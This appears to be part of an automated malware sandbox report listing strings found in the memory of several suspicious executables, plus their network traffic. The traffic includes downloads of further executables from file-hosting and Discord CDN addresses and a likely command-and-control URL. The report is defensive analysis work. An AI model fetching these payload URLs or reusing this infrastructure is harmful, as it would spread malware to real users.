                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                        Source: A70A.exe, 0000000B.00000002.603991878.0000000003EBE000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                        Source: A70A.exe, 0000000B.00000002.603991878.0000000003EBE000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                        Source: C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Responsex
                        Source: C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                        Source: A70A.exe, 0000000B.00000002.603991878.0000000003EBE000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                        Source: A70A.exe, 0000000B.00000002.601972098.0000000003DB2000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                        Source: C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Responsex
                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.601972098.0000000003DB2000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593626249.0000000002CE0000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.596302776.0000000002ECB000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.596302776.0000000002ECB000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.597967542.0000000002FE1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                        Source: C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.596302776.0000000002ECB000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.596302776.0000000002ECB000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.601972098.0000000003DB2000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                        Source: A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.601972098.0000000003DB2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                        Source: D375.exe, 0000001A.00000002.601649001.0000000001571000.00000004.00000020.sdmp, D375.exe, 0000001A.00000002.601572547.000000000154C000.00000004.00000020.sdmpString found in binary or memory: http://unic7m.top/index.php
                        Source: D375.exe, 0000001A.00000002.601649001.0000000001571000.00000004.00000020.sdmpString found in binary or memory: http://unic7m.top/index.php(
                        Source: A70A.exe, 0000000B.00000002.606343545.0000000004099000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
                        Source: A70A.exe, 0000000B.00000002.606343545.0000000004099000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
                        Source: A70A.exe, 0000000B.00000003.417761499.0000000003471000.00000004.00000001.sdmpString found in binary or memory: http://www.ncn.gov.pl/finansowanie-nauki/pomoc-publiczna
                        Source: A70A.exe, 0000000B.00000000.415048801.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000002.576541484.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000003.417761499.0000000003471000.00000004.00000001.sdmpString found in binary or memory: http://www.ncn.gov.pl/finansowanie-nauki/pomoc-publicznayX
                        Source: A70A.exe, 0000000B.00000003.417761499.0000000003471000.00000004.00000001.sdmpString found in binary or memory: http://www.stat.gov.pl/cps/rde/xbcr/bip/BIP_oz_wykaz_identyfikatorow.pdf
                        Source: A70A.exe, 0000000B.00000000.415048801.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000002.576541484.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000003.417761499.0000000003471000.00000004.00000001.sdmpString found in binary or memory: http://www.stat.gov.pl/cps/rde/xbcr/bip/BIP_oz_wykaz_identyfikatorow.pdfyX
                        Source: A70A.exe, 0000000B.00000002.603991878.0000000003EBE000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.603065372.0000000003E71000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.603701559.0000000003EA8000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.600555939.0000000003D43000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.599060773.00000000030D7000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.595143338.0000000002EB5000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.596302776.0000000002ECB000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.599190914.00000000030ED000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.600180400.0000000003CD2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598194373.0000000003016000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594596354.0000000002DF3000.00000004.00000001.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000010.00000002.499816087.0000000003BB1000.00000004.00000001.sdmp, C169.exe, 00000017.00000000.476958517.0000000000402000.00000040.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sb/ip
                        Source: C169.exe, 00000017.00000002.597704836.0000000002FA1000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com
                        Source: C169.exe, 00000017.00000002.593626249.0000000002CE0000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.596302776.0000000002ECB000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.597625234.0000000002F9B000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/914960103592054858/914986994759794738/Underdosed.exe
                        Source: C169.exe, 00000017.00000002.597704836.0000000002FA1000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com4
                        Source: A70A.exe, 0000000B.00000002.603991878.0000000003EBE000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.603065372.0000000003E71000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.603701559.0000000003EA8000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.600555939.0000000003D43000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.599060773.00000000030D7000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.595143338.0000000002EB5000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.596302776.0000000002ECB000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.599190914.00000000030ED000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.600180400.0000000003CD2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598194373.0000000003016000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594596354.0000000002DF3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: A70A.exe, 0000000B.00000000.415048801.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000002.576541484.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000003.417761499.0000000003471000.00000004.00000001.sdmpString found in binary or memory: https://cdn.jsdelivr.net/npm/popper.js
                        Source: A70A.exe, 0000000B.00000000.415048801.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000002.576541484.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000003.417761499.0000000003471000.00000004.00000001.sdmpString found in binary or memory: https://code.jquery.com/jquery-3.4.1.slim.min.js
                        Source: A70A.exe, 0000000B.00000000.415048801.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000002.576541484.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000003.417761499.0000000003471000.00000004.00000001.sdmpString found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
                        Source: C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598194373.0000000003016000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594596354.0000000002DF3000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: A70A.exe, 0000000B.00000002.603991878.0000000003EBE000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.603065372.0000000003E71000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.603701559.0000000003EA8000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.600555939.0000000003D43000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.599060773.00000000030D7000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.595143338.0000000002EB5000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.596302776.0000000002ECB000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.599190914.00000000030ED000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598194373.0000000003016000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594596354.0000000002DF3000.00000004.00000001.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: A70A.exe, 0000000B.00000002.603991878.0000000003EBE000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.596302776.0000000002ECB000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.599190914.00000000030ED000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab4
                        Source: C169.exe, 00000017.00000002.600180400.0000000003CD2000.00000004.00000001.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtabx
                        Source: C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598194373.0000000003016000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594596354.0000000002DF3000.00000004.00000001.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: A70A.exe, 0000000B.00000002.606343545.0000000004099000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmp String found in binary or memory: https://get.adob
                        Source: A70A.exe, 0000000B.00000002.606343545.0000000004099000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmp String found in binary or memory: https://helpx.ad
                        Source: A70A.exe, 0000000B.00000002.603991878.0000000003EBE000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.603065372.0000000003E71000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.603701559.0000000003EA8000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.600555939.0000000003D43000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.599060773.00000000030D7000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.595143338.0000000002EB5000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.596302776.0000000002ECB000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.599190914.00000000030ED000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.600180400.0000000003CD2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598194373.0000000003016000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594596354.0000000002DF3000.00000004.00000001.sdmp String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                        Source: A70A.exe, 0000000B.00000002.603991878.0000000003EBE000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.603065372.0000000003E71000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.603701559.0000000003EA8000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.600555939.0000000003D43000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.599060773.00000000030D7000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.595143338.0000000002EB5000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.596302776.0000000002ECB000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.599190914.00000000030ED000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.600180400.0000000003CD2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598194373.0000000003016000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594596354.0000000002DF3000.00000004.00000001.sdmp String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: A70A.exe, 0000000B.00000000.415048801.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000002.576541484.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000003.417761499.0000000003471000.00000004.00000001.sdmp String found in binary or memory: https://socfinder.site
                        Source: A70A.exe, 0000000B.00000000.415048801.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000002.576541484.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000003.417761499.0000000003471000.00000004.00000001.sdmp String found in binary or memory: https://socfinder.site/
                        Source: A70A.exe, 0000000B.00000000.415048801.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000002.576541484.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000003.417761499.0000000003471000.00000004.00000001.sdmp String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/js/bootstrap.min.js
                        Source: C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
                        Source: C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                        Source: A70A.exe, 0000000B.00000002.606343545.0000000004099000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_java
                        Source: A70A.exe, 0000000B.00000002.606343545.0000000004099000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
                        Source: A70A.exe, 0000000B.00000002.606343545.0000000004099000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
                        Source: A70A.exe, 0000000B.00000002.606343545.0000000004099000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_real
                        Source: C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
                        Source: A70A.exe, 0000000B.00000002.606343545.0000000004099000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
                        Source: C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/answer/6258784
                        Source: A70A.exe, 0000000B.00000002.603991878.0000000003EBE000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.603065372.0000000003E71000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.603701559.0000000003EA8000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.600555939.0000000003D43000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.599060773.00000000030D7000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.595143338.0000000002EB5000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.596302776.0000000002ECB000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.599190914.00000000030ED000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.600180400.0000000003CD2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598194373.0000000003016000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594596354.0000000002DF3000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: A70A.exe, 0000000B.00000000.415048801.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000002.576541484.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000003.417761499.0000000003471000.00000004.00000001.sdmp String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-133188560-4
                        Source: unknown DNS traffic detected: queries for: host-data-coin-11.com
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exe Code function: 22_2_00404A20 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,InternetConnectA,HttpOpenRequestA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrlen,lstrlen,GetProcessHeap,HeapAlloc,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrcatA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,
                        Source: global traffic HTTP traffic detected: GET /attachments/914960103592054858/914961866462232616/Oldening.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: cdn.discordapp.com
                        Source: global traffic HTTP traffic detected: GET /files/8723_1638191106_2017.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: host-file-host-3.com
                        Source: global traffic HTTP traffic detected: GET /files/6096_1638289274_6885.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: host-file-host-3.com
                        Source: global traffic HTTP traffic detected: GET /game.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: host-file-host-3.com
                        Source: global traffic HTTP traffic detected: GET /downloads/toolspab3.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: privacytoolzforyou-7000.com
                        Source: global traffic HTTP traffic detected: GET /files/4152_1638095425_4339.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: host-file-host-3.com
                        Source: global traffic HTTP traffic detected: GET /tratata.php HTTP/1.1 Host: file-file-host4.com Connection: Keep-Alive
                        Source: global traffic HTTP traffic detected: GET /sqlite3.dll HTTP/1.1 Host: file-file-host4.com Cache-Control: no-cache Cookie: PHPSESSID=sc69tg8a29f4pr0nv46ehfqbko
                        Source: global traffic HTTP traffic detected: GET /files/5311_1638303032_7343.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: host-file-host-3.com
                        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
                        Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
                        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 09:04:26 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 0d 0a 14 00 00 00 7b fa f7 1b b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
